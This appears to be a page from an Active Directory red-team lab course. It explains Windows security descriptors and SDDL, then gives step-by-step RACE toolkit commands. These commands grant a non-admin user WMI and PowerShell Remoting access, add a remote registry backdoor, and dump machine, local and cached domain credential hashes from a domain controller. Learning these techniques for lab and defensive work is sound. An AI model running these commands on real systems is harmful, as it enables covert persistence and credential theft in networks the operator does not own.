8.7.3 - Security Descriptors
Security Descriptors
Security Descriptors define access control for securable objects in Windows (e.g., services, WMI namespaces, registry keys). The format is described using SDDL (Security Descriptor Definition Language). SDDL strings are built from Access Control Entries (ACEs), which follow this structure:
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
Example ACE for built-in administrators on WMI namespaces:
A;CI;CCDCLCSWRPWPRCWD;;;SID
This ACE grants administrators full control over WMI resources.
Using RACE Toolkit for Security Descriptor Abuse
You can abuse security descriptors to grant non-admin users access to protected resources. The RACE toolkit simplifies this process:
Load the toolkit:
. C:\AD\Tools\RACE-master\RACE.ps1
Modify WMI Security Descriptors
On the local machine:
Set-RemoteWMI -SamAccountName student1 -Verbose
On a remote machine without credentials:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
On a remote machine with credentials:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
To remove permissions from the remote machine:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
Persistence via PowerShell Remoting Descriptors
Note: PS Remoting backdoors via ACLs became unstable after August 2020 patches.
🔸 On the local machine:
Set-RemotePSRemoting -SamAccountName student1 -Verbose
🔸 On a remote machine:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
🔸 To remove remoting access:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
Persistence via Remote Registry Descriptors
Using RACE or DAMP, you can grant registry access to users and retrieve sensitive hashes:
🔸 Add a backdoor via Remote Registry:
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
🔸 As
student1
, dump the machine account hash:
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
🔸 Retrieve local account hashes:
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
🔸 Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
Labs
Last updated